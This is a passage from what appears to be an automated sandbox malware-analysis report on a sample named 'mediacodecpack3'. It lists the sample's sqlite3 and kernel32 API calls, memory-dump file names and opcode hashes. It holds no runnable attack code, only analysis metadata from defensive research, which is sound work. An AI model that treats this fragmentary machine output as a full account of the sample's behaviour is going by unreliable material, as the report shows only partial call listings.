                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                            • sqlite3_free.SQLITE3 ref: 60965714
                                                                                            • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 2722129401-0
                                                                                            • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                            • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                            • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                            • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                              • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                            • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                              • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                            • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                            • sqlite3_free.SQLITE3 ref: 60964783
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 571598680-0
                                                                                            • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                            • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                                            • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                            • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040372D
                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 00403741
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040376D
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037A5
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037C7
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037E0
                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 004037F3
                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403831
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1823725401-0
                                                                                            • Opcode ID: 7f1ee2c931afbeb2bcd72820eb8f065979dd47f7a99393091ec5d7620f58e433
                                                                                            • Instruction ID: 45b108152198534a65e95edcfca0b8ba0a54c8eec5aa0c4c05c1d64ec2385aa0
                                                                                            • Opcode Fuzzy Hash: 7f1ee2c931afbeb2bcd72820eb8f065979dd47f7a99393091ec5d7620f58e433
                                                                                            • Instruction Fuzzy Hash: 2131D2F35082619ED7203F745DC483BBE9CEA4530A715453FF981F3280DA795D4286A9
                                                                                            APIs
                                                                                            • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                              • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                            • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                            • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                            • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                            • sqlite3_free.SQLITE3 ref: 60963621
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                            • String ID:
                                                                                            • API String ID: 4276469440-0
                                                                                            • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                            • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                            • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                            • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                            Strings
                                                                                            • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                            • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                            • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                            • API String ID: 4080917175-264706735
                                                                                            • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                            • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                            • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                            • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                            APIs
                                                                                              • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                            • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                            • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: library routine called out of sequence$out of memory
                                                                                            • API String ID: 2019783549-3029887290
                                                                                            • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                            • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                            • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                            • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                            APIs
                                                                                            • GetStringTypeW.KERNEL32(00000001,00408640,00000001,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 004062BD
                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,0040863C,00000001,?,?,00000000,00000000,00000001), ref: 004062D7
                                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 0040630B
                                                                                            • MultiByteToWideChar.KERNEL32(00405E87,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406343
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406399
                                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 3852931651-0
                                                                                            • Opcode ID: d203232162232c56530dc1c9e7ac7d7ca2f1092592616d16a6b156e600e46040
                                                                                            • Instruction ID: 1973b5c1488275f86b32e201772009c48c68fd6130b56f6c31499d13724d529d
                                                                                            • Opcode Fuzzy Hash: d203232162232c56530dc1c9e7ac7d7ca2f1092592616d16a6b156e600e46040
                                                                                            • Instruction Fuzzy Hash: 97418E72500219EFDF119F94DE86AAF3F78EB04350F11453AFA52F6290C73989608BE8
                                                                                            APIs
                                                                                            • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                              • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                            • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                            • String ID: List of tree roots: $d$|
                                                                                            • API String ID: 3709608969-1164703836
                                                                                            • Opcode ID: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                                            • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                            • Opcode Fuzzy Hash: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                                            • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                            APIs
                                                                                              • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                              • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                              • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                              • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                            • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                            • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                            • String ID: e
                                                                                            • API String ID: 786425071-4024072794
                                                                                            • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                            • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                            • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                            • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                            APIs
                                                                                            • GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403A70
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403AD0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                            • API String ID: 1385375860-4131005785
                                                                                            • Opcode ID: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
                                                                                            • Instruction ID: 8e0d8efe135bd9bd4ab90b631ae35de0fa5087430b450c3f58eab12f6465c816
                                                                                            • Opcode Fuzzy Hash: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
                                                                                            • Instruction Fuzzy Hash: BD3102319012886DEB319A745C46B9B7F6C9B02309F2404FBE185F52C3E6389F89CB1D
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_exec
                                                                                            • String ID: sqlite_master$sqlite_temp_master$|
                                                                                            • API String ID: 2141490097-2247242311
                                                                                            • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                            • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                            • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                            • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                            APIs
                                                                                              • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                            • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                            • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                              • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                              • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                              • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                              • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID:
                                                                                            • API String ID: 683514883-0
                                                                                            • Opcode ID: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                                            • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                            • Opcode Fuzzy Hash: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                                            • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                            APIs
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                              • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                              • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                              • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                              • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                              • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 1903298374-0
                                                                                            • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                            • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                            • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                            • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                            APIs
                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 0040389D
                                                                                            • GetFileType.KERNEL32(00000800), ref: 00403943
                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 0040399C
                                                                                            • GetFileType.KERNEL32(00000000), ref: 004039AA
                                                                                            • SetHandleCount.KERNEL32 ref: 004039E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                                            • String ID:
                                                                                            • API String ID: 1710529072-0
                                                                                            • Opcode ID: f9f6c698642d398b554f84be3c90f4064283888af6bbc673017cb63da6670b61
                                                                                            • Instruction ID: 825ec877f99b7629084fcbf2355a8090dcaf6ef966e66130ad5ff06318bbd0a8
                                                                                            • Opcode Fuzzy Hash: f9f6c698642d398b554f84be3c90f4064283888af6bbc673017cb63da6670b61
                                                                                            • Instruction Fuzzy Hash: 125125B15046018FD7208F29C988B667F98BB02736F15873AE492FB3E1D7BC9A05C709
                                                                                            APIs
                                                                                              • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                            • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
